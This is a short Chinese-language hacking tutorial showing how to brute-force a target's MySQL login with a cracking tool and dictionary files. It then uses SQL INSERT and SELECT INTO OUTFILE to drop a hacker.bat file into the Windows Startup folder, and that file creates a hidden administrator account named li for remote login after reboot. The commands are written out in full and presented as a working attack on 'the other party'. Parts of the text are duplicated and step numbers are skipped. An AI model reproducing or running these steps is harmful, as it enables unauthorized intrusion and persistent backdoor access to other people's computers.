1.用mysql_pwd_crack.exe工具扫描对方mysql的用户名和密码
字典文件分别命名为:user.dic pass.dic
2.登陆对方的mysql(假设已经扫出用户名为为abc、密码为abc)
5.在数据库aaa中创建表bbb,字段名为ccc
6.在表中插入批处理文件代码
7.将批处理文件中的代码查询出来,并以批处理文件hacker.bat的格式保存在C:\\Documents and Settings\\Administrator\\「开始」菜单 \\程序\\启动\\目录下
测试结果:当对方重启计算机时,会发现他的计算机系统中会自动生成一个有管理员权限的用户li,并且用它可以远程登陆他的计算机。
mysql_pwd_crack.exe 192.168.1.14 -x 3306 -a
字典文件分别命名为:user.dic pass.dic
2.登陆对方的mysql(假设已经扫出用户名为为abc、密码为abc)
mysql -h 192.168.1.14 -u abc -p
3.创建数据库
create database aaa;
4.进入数据库
use aaa;
5.在数据库aaa中创建表bbb,字段名为ccc
create table bbb(ccc text);
6.在表中插入批处理文件代码
insert into bbb values(“@echo off”);
insert into bbb values(“net user li 123456 /add”);
insert into bbb values(“net user li /active:yes”);
insert into bbb values(“net localgroup Administrators li /add”);
7.将批处理文件中的代码查询出来,并以批处理文件hacker.bat的格式保存在C:\\Documents and Settings\\Administrator\\「开始」菜单 \\程序\\启动\\目录下
SELECT * INTO OUTFILE 'C:\\Documents and Settings\\Administrator\\「开始」菜单\\程序\\启动\\hacker.bat'
FIELDS TERMINATED BY ' '
ENCLOSED BY ' '
ESCAPED BY ' '
LINES TERMINATED BY '\n'
FROM bbb;
测试结果:当对方重启计算机时,会发现他的计算机系统中会自动生成一个有管理员权限的用户li,并且用它可以远程登陆他的计算机。